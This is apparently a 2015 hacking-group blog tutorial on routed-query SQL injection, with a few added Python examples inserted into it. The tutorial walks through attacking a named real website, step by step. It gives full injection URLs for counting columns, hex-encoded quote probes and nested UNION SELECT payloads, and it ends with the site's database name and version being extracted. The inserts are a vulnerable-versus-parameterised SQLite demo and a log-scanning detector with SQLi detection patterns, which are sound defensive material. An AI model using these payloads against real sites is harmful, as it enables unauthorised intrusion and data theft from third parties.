Sqli With Routed Query

Lesson 6: SQLi With Routed Query.


Tutorials by Team Hind And CyberSecuritySquad
About me:
Name: Navdeep Singh
Facebook ID: https://www.facebook.com/navdeep.dhukia.5
Facebook official page (CSS): https://www.facebook.com/BlackHatHackers555
Facebook official page (Team Hind): https://www.facebook.com/TeamHind/
Website: http://www.securitykiller.org


Step2. I have a website.
I have a site: http://www.agritechno.ch/index2.php?rub=11

We add a single quote (') after ?rub=11
Like this: http://www.agritechno.ch/index2.php?rub=11'
Hit Enter.

Step3. After adding the single quote ('), if the site shows an SQL error or hides data on the page, this means it is vulnerable.

Step4. Start the operation on the URL. Now we count the total number of columns in information_schema.
We use an ORDER BY query to count the columns.
Like this: http://www.agritechno.ch/index2.php?rub=11 order by 1--

It shows an error, so first I fix the query: I replace the (--) and add (;) after the ORDER BY.

Ex: http://www.agritechno.ch/index2.php?rub=11 group by 14;
Now the total number of columns is between 1 and 100.
Here the total number of columns is 14, because at 15 we got an error.



Step5. Now I use the UNION command to check for vulnerable columns.
Like this: http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14;


We did not see any vulnerable columns there, which means it is a routed query injection: a value returned by this query is passed into a second query, and the page shows the result of that second query.

Now start the routed query operation: we find which column is the routed query.

How do we check whether a column is a routed query?

There is a trick for that:

Put an apostrophe (single quote) after each column number and hex-encode it.

Step6. If the page gets redirected or we get an error on the page, then we can assume that column is the routed query.

Like this:
Ex1. http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1',2,3,4,5,6,7,8,9,10,11,12,13,14;
Now encoded in hex (1'): http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 0x3127,2,3,4,5,6,7,8,9,10,11,12,13,14;
Check all the columns like this.

Here column no. 11 is routed. Now check it:
http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11',12,13,14;
Hex (11'): http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,0x313127,12,13,14;

SQL error.

Hip hip hurray, we got the routed column: it is (11).
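
Why the quote in one column produces an SQL error, and what closes it, shown from the application side. This is an added example, not code from the original tutorial or from the site it discusses; the two-table schema, the function names and the use of SQLite in place of MySQL are assumptions made so it runs offline.

```python
import sqlite3

def make_db():
    # Constructed schema: each rubric row names the section its articles live in.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE rubrics (id INTEGER, section_id INTEGER);
        CREATE TABLE articles (section_id INTEGER, title TEXT);
        INSERT INTO rubrics VALUES (11, 7);
        INSERT INTO articles VALUES (7, 'Tractors');
    """)
    return db

def titles_vulnerable(db, rub):
    # Query 1: the request parameter is concatenated into the SQL text.
    row = db.execute("SELECT id, section_id FROM rubrics WHERE id = " + rub).fetchone()
    if row is None:
        return []
    # Query 2: a column of query 1's result is concatenated again. This is the routing.
    sql = "SELECT title FROM articles WHERE section_id = " + str(row[1])
    return [r[0] for r in db.execute(sql)]

def titles_hardened(db, rub):
    # Both queries bind their inputs, so values read back from the database stay data.
    row = db.execute("SELECT id, section_id FROM rubrics WHERE id = ?", (rub,)).fetchone()
    if row is None:
        return []
    rows = db.execute("SELECT title FROM articles WHERE section_id = ?", (row[1],))
    return [r[0] for r in rows]

def probe(fn, rub):
    # Returns the titles, or "sql-error" if the database rejected a statement.
    try:
        return fn(make_db(), rub)
    except sqlite3.Error:
        return "sql-error"

# Constructed input mirroring the Step6 check: a quote placed in the routed column.
ROUTED_QUOTE = "-11 UNION SELECT 1, '7'''"
```

Binding only the first query is not enough in general: any value the second query takes from a result set has to be bound as well, because it may not have come from the table the developer expected.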

Step7. Now let's get the column count and the vulnerable column as well.

Like this: http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,"11 order by 20--",12,13,14;
Error: there are not 20 columns here, so decrease the count.
Now try 19 in the ORDER BY.
Like this: http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,"11 order by 19--",12,13,14;
No error: there are 19 columns in the routed query (11).

Step8. Now use the UNION statement.
Like this: http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,"-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--",12,13,14;

Congrats, we got the vulnerable columns: 3 and 14.

Now all steps are the same as in Lesson 1 (simple union-based).

Step9. Now find the database and version.

Like this:
http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 0x3127,2,3,4,5,6,7,8,9,10,"-11 UNION SELECT 1,2,concat(database(),0x7c3d7c,version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--",12,13,14;
You see on the website page: database = 'agritechnoch', version = '5.0.67-log'

I think you all understand now. Find the tables and columns and fetch the data as in simple union-based injection.
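
The requests in Steps 4 to 9 leave a recognisable trail in web server logs: column-count probes, hex literals, and a second UNION SELECT carried inside the first. The following triage script is an added example, not part of the original tutorial; the log lines, the /item.php?id= endpoint and the indicator names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (documentation IP ranges, hypothetical endpoint).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Sep/2015:10:00:01 +0000] "GET /item.php?id=11 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [12/Sep/2015:10:00:09 +0000] "GET /item.php?id=11%20order%20by%2015 HTTP/1.1" 200 812',
    '203.0.113.5 - - [12/Sep/2015:10:01:30 +0000] "GET /item.php?id=-11%20UNION%20SELECT%201,2,0x313127,4 HTTP/1.1" 200 640',
    '203.0.113.5 - - [12/Sep/2015:10:02:44 +0000] "GET /item.php?id=-11%20UNION%20SELECT%201,%2211%20UNION%20SELECT%201,2--%22,3 HTTP/1.1" 200 702',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
UNION = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
HEX_LITERAL = re.compile(r"\b0x(?:[0-9a-f]{2})+\b", re.I)
COUNT_PROBE = re.compile(r"\b(?:order|group)\s+by\s+\d+", re.I)

def classify(url):
    """Return the sorted indicator names found in the decoded query parameters of url."""
    hits = set()
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        unions = len(UNION.findall(value))
        if unions >= 1:
            hits.add("union-select")
        if unions >= 2:
            hits.add("nested-union")  # a UNION inside a UNION: the routed-query shape
        if HEX_LITERAL.search(value):
            hits.add("hex-literal")
        if COUNT_PROBE.search(value):
            hits.add("column-count-probe")
    return sorted(hits)

def scan(lines):
    """Return (client_ip, indicators) for every log line with at least one indicator."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        tags = classify(m.group(2)) if m else []
        if tags:
            findings.append((m.group(1), tags))
    return findings
```

Keyword matches like these are a triage signal for review, since ordinary search text can contain the same words; the nested-union hit is the one most specific to the routed technique.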



 Lesson No. 2: SQLi union-based with WAF bypass
 Upload on Tom. 08-09-2015

 We Are:- | VIKYP | INDCYBERJOCKER |  In73ct0r d3vil | Navdeep Singh | CYBA TIGER | ANONFIGHTER | Mr.Hex | GHOSTF133T | VINEET RV | Hacker Ritz | SNIPER |


Sqli With Routed Query, reviewed by Unknown on 12/09/2015. Rating: 5